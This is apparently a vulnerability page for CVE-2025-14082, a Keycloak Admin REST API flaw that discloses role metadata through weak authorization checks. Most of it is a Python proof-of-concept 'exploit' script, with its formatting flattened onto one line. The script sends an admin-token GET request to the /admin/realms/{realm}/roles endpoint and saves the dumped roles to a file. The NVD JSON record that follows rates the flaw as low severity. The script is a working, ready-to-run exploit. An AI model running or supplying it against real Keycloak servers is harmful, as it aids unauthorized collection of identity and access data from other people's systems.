CVE-2025-14082

import requests import json # CVE-2025-14082 PoC - Keycloak Admin REST API Information Disclosure # Description: Insufficient authorization checks on /admin/realms/{realm}/roles endpoint # allows disclosure of sensitive role metadata def exploit_cve_2025_14082(keycloak_url, realm, access_token): """ Exploit for CVE-2025-14082: Keycloak Admin REST API role metadata disclosure Args: keycloak_url: Base URL of Keycloak server (e.g., https://keycloak.example.com) realm: Target realm name access_token: Valid access token with admin privileges Returns: JSON response containing role metadata """ headers = { 'Authorization': f'Bearer {access_token}', 'Content-Type': 'application/json' } # Vulnerable endpoint - /admin/realms/{realm}/roles url = f"{keycloak_url}/admin/realms/{realm}/roles" print(f"[*] Target: {url}") print(f"[*] Realm: {realm}") print("[*] Attempting to retrieve sensitive role metadata...") try: response = requests.get(url, headers=headers, timeout=30) if response.status_code == 200: roles = response.json() print(f"[!] SUCCESS: Retrieved {len(roles)} role entries") print("[*] Sample role metadata:") # Display sensitive metadata that should not be accessible for role in roles[:5]: # Show first 5 roles print(f" - Role: {role.get('name', 'N/A')}") print(f" Description: {role.get('description', 'N/A')}") print(f" Attributes: {role.get('attributes', {})}") return roles elif response.status_code == 401: print("[-] FAILED: Unauthorized - Invalid or expired token") elif response.status_code == 403: print("[-] FAILED: Forbidden - Insufficient permissions") else: print(f"[-] FAILED: HTTP {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] ERROR: {str(e)}") return None # Example usage if __name__ == "__main__": # Configuration KEYCLOAK_URL = "https://keycloak.example.com" REALM = "master" ACCESS_TOKEN = "your-admin-access-token-here" # Execute exploit result = exploit_cve_2025_14082(KEYCLOAK_URL, REALM, ACCESS_TOKEN) if result: print("\n[*] Exploit completed - sensitive metadata retrieved") # Save full response for analysis with open('role_metadata_dump.json', 'w') as f: json.dump(result, f, indent=2) print("[*] Full data saved to role_metadata_dump.json")

{"cve": {"id": "CVE-2025-14082", "sourceIdentifier": "[email protected]", "published": "2025-12-10T09:15:46.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak Admin REST (Representational State Transfer) API. This vulnerability allows information disclosure of sensitive role metadata via insufficient authorization checks on the /admin/realms/{realm}/roles endpoint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14082", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419078", "source": "[email protected]"}]}}